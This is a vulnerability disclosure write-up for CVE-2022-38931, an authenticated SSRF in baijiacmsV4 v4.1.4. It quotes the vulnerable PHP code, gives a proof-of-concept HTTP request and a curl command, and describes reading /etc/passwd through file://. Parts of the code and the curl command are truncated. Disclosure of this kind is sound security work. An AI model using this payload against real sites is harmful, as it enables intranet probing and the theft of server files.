

CVE-2022-38931: CVE_Request/ at master · zer0yu/CVE_Request

A Server-Side Request Forgery (SSRF) in fetch_net_file_upload function of baijiacmsV4 v4.1.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.


SSRF vulnerability in fetch_net_file_upload Function of file.php File (baijiacms v4.1.4 version)****0x01 Affected version


version: V4.1.4

php version: 7.x

0x02 Vulnerability description

A Server-Side Request Forgery (SSRF) in fetch_net_file_upload function of baijiacmsv4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter. We should note that the vulnerability requires authentication before it can be triggered.

The vulnerable code is located in the fetch_net_file_upload function in the includes/baijiacms/ file. This function is called in the file system/public/class/web/file.php. Because the function does not perform sufficient checksumming on the url parameter, the taint is introduced from the $url variable into the tainted function file_get_contents, and after the file_get_contents function is executed it sends a request to the URL specified by the url parameter, eventually leading to an SSRF vulnerability.

The file system/public/class/web/file.php calls the fetch_net_file_upload function with the following code

if ($do == ‘fetch’) { $url = trim($_GPC[‘url’]); // $_GPC actually is $_GET $file = fetch_net_file_upload($url); if (is_error($file)) { $result[‘message’] = $file[‘message’]; die(json_encode($result)); } }

The relevant code for the file includes/baijiacms/ is shown below

function fetch_net_file_upload($url) { $url = trim($url); $extention = pathinfo($url, PATHINFO_EXTENSION); $path = '/attachment/’; $extpath = “{$extention}/” . date(‘Y/m/’);

mkdirs(WEB\_ROOT . $path . $extpath);
do {
    $filename = random(15) . ".{$extention}";
} while (is\_file(SYSTEM\_WEBROOT . $path . $extpath . $filename));

$file\_tmp\_name = SYSTEM\_WEBROOT . $path . $extpath . $filename;
$file\_relative\_path = $extpath . $filename;
if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) {
    $result\['message'\] = '提取失败.';
    return $result;
$file\_full\_path = WEB\_ROOT . $path . $extpath . $filename;
return file\_save($file\_tmp\_name, $filename, $extention, $file\_full\_path, $file\_relative\_path);


Because the url parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

GET /index.php?mod=site&do=file&act=public&op=fetch&beid=1&url=http%3A%2F%2F172.16.119.1%2Fzfuzz HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Cookie: PHPSESSID=e7m370238fh577ta0kbqmkr7e1; __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=
Connection: close

You can also use the following curl command to verify the vulnerability

curl -i -s -k -X $'GET' \
    -H $'Host:' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Connection: close' \
    -b $'PHPSESSID=e7m370238fh577ta0kbqmkr7e1; __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=' \

The vulnerability can also be exploited to read arbitrary local files using the file:// protocol, as the vulnerability saves the fetched content under the attachment folder and returns the corresponding file name. So we can directly access the corresponding file to get the file content.

Access the corresponding file to get the contents of the /etc/passwd file

0x03 Acknowledgement

Ez Wang, Yf Gao, Zh Wang, Lj Wu, W Xie

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